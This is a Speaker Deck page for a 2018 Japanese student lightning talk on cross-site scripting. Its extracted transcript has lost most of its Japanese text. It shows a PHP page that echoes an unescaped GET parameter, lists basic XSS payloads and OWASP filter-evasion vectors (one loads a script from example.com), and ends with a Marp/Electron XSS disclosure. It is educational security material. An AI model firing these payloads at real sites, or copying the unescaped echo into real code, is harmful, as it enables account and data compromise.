Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
XSSの入力値を調べてみた / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.2k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
44
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
210
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
460
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
250
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
100
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
110
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
210
ブレース展開のススメ
tomoyk
0
340
スマートフォンにおける気象データの可視化 / Visualization of the weather data for the smartphone
tomoyk
0
35
Other Decks in Technology
See All in Technology
「一通りできるようになった」その先の話
hitomi___kt
0
150
Oracle Transaction Manager for Microservices Free 22.3 製品概要
oracle4engineer
PRO
5
120
CSS Variable をもっと活用する / Kyoto.js 18
spring_raining
2
1.1k
メドレー エンジニア採用資料/ Medley Engineer Guide
medley
3
5.2k
あつめたデータをどう扱うか
skrb
2
170
CES_2023_FleetWise_demo.pdf
sparkgene
0
130
イ良い日ンマを作る(USBストレージ容量偽装の手法) / USB Storage Capacity Faking Techniques
shutingrz
0
560
ECSコスト削減のブレイクアウトセッションを聴いてきた話 / joining a breakout session on reducing costs with ECS
yayoi_dd
0
140
クックパッドがRubyKaigiに20名以上の社員で参加するわけ
midorikawa
0
400
Multi-Cloud Gatewayでデータを統治せよ!/ Data Federation with MCG
tutsunom
1
350
組織に対してSREを適用するとどうなるか
kuniim
9
3.1k
cdk deployに必要な権限ってなんだ?
kinyok
0
200
Featured
See All Featured
Designing with Data
zakiwarfel
91
4.2k
Bash Introduction
62gerente
601
210k
Raft: Consensus for Rubyists
vanstee
130
5.7k
Documentation Writing (for coders)
carmenintech
51
2.9k
Scaling GitHub
holman
453
140k
A better future with KSS
kneath
230
16k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
270
12k
How New CSS Is Changing Everything About Graphic Design on the Web
jensimmons
214
12k
The Invisible Customer
myddelton
113
12k
Building Adaptive Systems
keathley
27
1.3k
Producing Creativity
orderedlist
PRO
335
38k
How STYLIGHT went responsive
nonsquared
89
4.2k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
hitomi___kt
oracle4engineer
spring_raining
medley
skrb
sparkgene
shutingrz
yayoi_dd
midorikawa
tutsunom
kuniim
kinyok
zakiwarfel
62gerente
vanstee
carmenintech
holman
kneath
stephaniewalter
jensimmons
myddelton
keathley
orderedlist
nonsquared
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
